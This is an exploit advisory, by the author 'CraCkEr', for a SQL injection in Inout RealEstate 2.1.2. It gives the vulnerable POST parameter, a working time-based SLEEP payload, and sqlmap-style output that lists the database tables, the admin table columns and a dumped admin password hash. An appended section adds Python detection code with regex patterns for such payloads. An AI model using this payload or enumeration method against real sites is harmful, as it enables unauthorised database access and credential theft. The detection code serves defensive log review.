Inout RealEstate 2.1.2 SQL Injection

CraCkEr
THE CRACK OF ETERNAL MIGHT

From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts
Software  : Inout RealEstate 2.1.2
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Inout RealEstate is an easy, flexible and simple property management solution ideal for business start-ups

B4nks-NET irc.b4nks.tk #unix

Release Notes:
═════════════
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets:

The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022


POST parameter 'lidaray' is vulnerable.

---
Parameter: lidaray (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb
---

[INFO] the back-end DBMS is MySQL

[INFO] fetching current database
current database: 'inout_realestate'


fetching tables for database: 'inout_realestate'

Database: inout_realestate
[45 tables]
+--------------------------------+
| adcode |
| admin_account |
| admin_payment_details |
| agent_list_request_to_user |
| broker_citymap |
| broker_rate |
| broker_review |
| brokerabusereport |
| category_property |
| chat_details |
| chat_messages |
| checkout_ipn |
| countries |
| custom_field |
| detail_statistics_list |
| email_templates |
| enquiry_status |
| forgetpassword |
| inout_ipns |
| invoicegen |
| languages |
| list_brokermap |
| list_images |
| list_main |
| listopenhouse |
| normal_statistics_list |
| paymentdetailstat |
| ppc_currency |
| public_side_media_detail |
| public_slide_images |
| pupularsiarchlist |
| recentsearchlist |
| settings |
| sold_listing |
| soldlistadd |
| traveller_bank_deposit_history |
| user_broker_licenses |
| user_broker_registration |
| user_email_verification |
| user_list_agent_request |
| user_registration |
| user_wishlist_mapping |
| userabusereport |
| userlistactive |
| wish_list |
+--------------------------------+


[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| admin_type | tinyint(4) |
| id | int(11) |
| logouttime | int(11) |
| password | varchar(255) |
| status | tinyint(4) |
| username | varchar(200) |
+------------+--------------+


[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'

Database: inout_realestate
Table: admin_account
[1 entry]
+----+----------+------------------------------------------+------------+
| id | username | password | admin_type |
+----+----------+------------------------------------------+------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0 |
+----+----------+------------------------------------------+------------+


[-] Done
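
For detection, the payload quoted above has two features a log review can key on: a single quote that breaks out of the string literal followed by a boolean operator, and a MySQL delay call, with the response held back by roughly the sleep interval when the injected SQL actually runs. The Python below is an added example, not part of the original advisory or of the vendor's code; the record layout (path, raw POST body, response seconds), the placeholder path and the 4-second threshold are assumptions.

```python
import re
from urllib.parse import parse_qsl

# MySQL delay primitives used by time-based blind injection (SLEEP is the one on this page).
DELAY_CALL = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)
# A single quote closing the string literal, followed by a boolean operator.
QUOTE_BREAKOUT = re.compile(r"'\s*(?:and|or)\b", re.IGNORECASE)
SLOW_SECONDS = 4.0  # assumed threshold; tune to the endpoint's normal latency


def suspicious_params(body):
    """Return names of form fields whose decoded value looks like a timed SQL probe."""
    return [
        name
        for name, value in parse_qsl(body, keep_blank_values=True)
        if DELAY_CALL.search(value) and QUOTE_BREAKOUT.search(value)
    ]


def triage(records):
    """Label each flagged field: 'confirmed' if the response was also delayed
    (the injected SQL ran), otherwise 'probe' (payload seen, no delay)."""
    findings = []
    for path, body, seconds in records:
        for name in suspicious_params(body):
            verdict = "confirmed" if seconds >= SLOW_SECONDS else "probe"
            findings.append((path, name, verdict))
    return findings


# URL-encoded form of the payload quoted in the advisory.
PAGE_PAYLOAD = ("lidaray=20MKTTVT24%27+AND+%28SELECT+1823+FROM+"
                "%28SELECT%28SLEEP%285%29%29%29Caim%29+AND+%27bHOb%27%3D%27bHOb")

# Constructed sample records: (path, raw POST body, response time in seconds).
# The path is a placeholder; the advisory does not name the endpoint.
SAMPLE = [
    ("/placeholder-endpoint", "lidaray=20MKTTVT24", 0.12),
    ("/placeholder-endpoint", PAGE_PAYLOAD, 5.21),   # delayed: the SLEEP executed
    ("/placeholder-endpoint", PAGE_PAYLOAD, 0.09),   # same payload after a fix: no delay
    ("/placeholder-endpoint", "msg=could+not+sleep+(at+all)+and+called+the+agent", 0.30),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Requiring both patterns keeps ordinary text that merely contains "sleep (" from being flagged, as the last sample record shows.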